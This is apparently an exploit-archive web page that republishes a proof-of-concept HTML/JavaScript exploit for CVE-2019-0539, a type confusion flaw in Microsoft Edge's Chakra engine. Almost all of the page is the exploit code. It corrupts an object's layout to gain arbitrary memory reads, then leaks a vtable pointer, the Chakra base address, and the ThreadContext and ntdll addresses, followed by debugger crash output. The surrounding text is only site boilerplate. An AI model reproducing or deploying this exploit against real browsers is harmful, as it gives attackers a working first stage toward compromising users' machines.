Registermicrosoft edge chakra 1.11.4 read permission via type confusion
▸▸▸ Exploit & Vulnerability >> dos exploit & windows vulnerability
Online Vulnerability Scanner Tools
Code...
<html> <script> /* # Exploit Title: [getting Read permission through Type Confusion] # Date: [date] # Exploit Author: [Fahad Aid Alharbi] # Vendor Homepage: [https://www.microsoft.com/en-us/] # Version: [Chakra 1_11_4] (REQUIRED) # Tested on: [Windows 10] # CVE : [cve-2019-0539] */ /* author @0x4142 => Fahad Aid Alharbi * cve-2019-0539 * Getting Read &_^ * date 27 Feb , 2019 */ var convert = new ArrayBuffer(0x100); var u32 = new Uint32Array(convert); var f64 = new Float64Array(convert); var BASE = 0x100000000; function hex(x) { return `0x${x.toString(16)}` } function bytes_to_u64(bytes) { return (bytes[0]+bytes[1]*0x100+bytes[2]*0x10000+bytes[3]*0x1000000 +bytes[4]*0x100000000+bytes[5]*0x10000000000); } function i2f(x) { u32[0] = x % BASE; u32[1] = (x - (x % BASE)) / BASE; return f64[0]; } function f2i(x) { f64[0] = x; return u32[0] + BASE * u32[1]; } obj = {} obj.a = 0x41; obj.b = 0x42; obj.c = 0x41; obj.d = 0x42; obj.e = 0x40; obj.f = 0x40; obj.g = 0x90; obj.h = 0x90; obj.i = 0x90; t = new ArrayBuffer(0x200); newL = 0x1000; hax = new ArrayBuffer(0x2000); read_me = 0; function hit_to_read(t){ obj.h = hax; // set ta->buffer to hax obj.i = newL; // update target's length read_me = new Float64Array(t); return read_me; } function read(r,read_me) { read_me[7] = i2f(r); // setup hax->buffer //hax = new ArrayBuffer(0x1000); return hex(f2i(read_me[7])) } function cout(f){return document.write(f);} function opt(o, c, value) { o.c = 1 //o.a = "HELLO" // o.b = 3; //o.e = 1 class A extends c { } o.a = value // will overwrite rcx , rdx , rax //o.b = value => chakra!Js::RecyclableObject::HasOnlyWritableDataProperties+0xe: //o.b = 0x42424242 o.c = 555555 // o.d = 4 } function pwn() { for (let i = 0; i < 0x1000; i++) { let o = {a: 1, b: 2,c:3}; opt(o, (function () {}), {}); } let o = {a: 2222, b: 2,c:4,d:5}; let cons = function () {}; cons.prototype = o; /* line 120 auxSlots *p __Vfptr | type | 0x00000001234 | 0x0 */ opt(o, cons, obj); o.f = t read_me = hit_to_read(t); cout("[+] vtable pointer is " + hex(f2i(read_me[0]))); vtable = hex(f2i(read_me[0])); buffer_addr = f2i(read_me[7]); Chakrabase = hex(vtable - 0x59a3c0) cout("<br>") cout("[+] ChakraBase : " + Chakrabase) cout("<br>buffer_addr: " + read(buffer_addr + 40 , read_me)) ThreadContext = read(Chakrabase - 0xffec5448,read_me) Ntdll = read(Chakrabase - 0xdd9a0000,read_me) cout("<br>") cout("[+] ThreadContext : " + ThreadContext) cout("<br>") cout("[+] Ntdl : " + Ntdll) } pwn(); /* s=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 chakra!Js::SimpleDictionaryTypeHandlerBase<unsigned short,Js::PropertyRecord const * __ptr64,0>::GetPropertyFromDescriptor<0>+0x59: 00007ffc`d61f4109 4c8b14c8 mov r10,qword ptr [rax+rcx*8] ds:00010000`41414141=???????????????? */ /* s=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 chakra!Js::SimpleDictionaryTypeHandlerBase<unsigned short,Js::PropertyRecord const * __ptr64,0>::GetPropertyFromDescriptor<0>+0x59: 00007ffc`d61f4109 4c8b14c8 mov r10,qword ptr [rax+rcx*8] ds:00010000`41414141=???????????????? */ </script></html>
Microsoft edge chakra 1.11.4 read permission via type confusion Vulnerability / Exploit Source : Microsoft edge chakra 1.11.4 read permission via type confusion
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes